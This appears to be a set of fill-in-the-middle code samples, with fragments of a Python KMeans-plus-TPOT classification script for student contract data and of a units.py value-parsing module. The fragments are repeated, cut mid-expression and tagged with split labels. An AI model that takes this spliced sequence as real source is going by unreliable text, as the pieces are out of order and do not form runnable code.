# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
#划分训练测试集
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# 划分label
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
#sample_weigth
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
#k_means划分类别
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0) # 构造聚类器
estimator.fit(x_train.drop(labels, axis=1)) # 聚类
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
# 类似class_weight
"subsample": [0.85], # 取多少样本,放过拟合
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
'learning_rate ': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
| random_line_split |
||
kmeans_to_classifier_main.py | [labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t,v)
# 特征筛选
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
#划分训练测试集
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# 划分label
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
#sample_weigth
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
#k_means划分类别
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0) # 构造聚类器
estimator.fit(x_train.drop(labels, axis=1)) # 聚类
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
# 类似class_weight
"subsample": [0.85], # 取多少样本,放过拟合
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
'learning_rate ': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
for i in range(5):
tpo = TPOTClassifier(generations=10, verbosity=2, population_size=150,
scoring='f1', n_jobs=-1, config_dict=tpot_config,
mutation_rate | =0.8, crossover_rate=0.2)
x_train_x = np.array(x_train[x_train["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
x_test_x = np.array(x_test[x_test["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
df_btest_x = df_btest[df_btest["chunk_label"] == i].drop("chunk_label",
axis=1)
y_train_x = np.array(x_train[labels])
# clf = tpo.fit(x_train_x, y_train_x)
#
# print(len(df_btest_x))
# print("=========modelu", i, "============")
# evalution_model(clf, df_btest_x.drop("is_sucess_by_contract", axis=1),
# df_btest_x["is_sucess_by_contract"])
#
#
# evalution_model(clf, df_btest.drop("is_sucess_by_contract", axis=1), df_btest["is_sucess_by_contract"])
#
#
# # | conditional_block |
|
units.py | particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
|
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply | raise TypeError("Types do not match") | conditional_block |
units.py | particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def | (self: _TT, other: float) -> _TT:
"""
Multiply | __mul__ | identifier_name |
units.py | some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888 | 'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by | _prefix_table = {
'y': 1e-24, # yocto | random_line_split |
units.py | particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
|
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
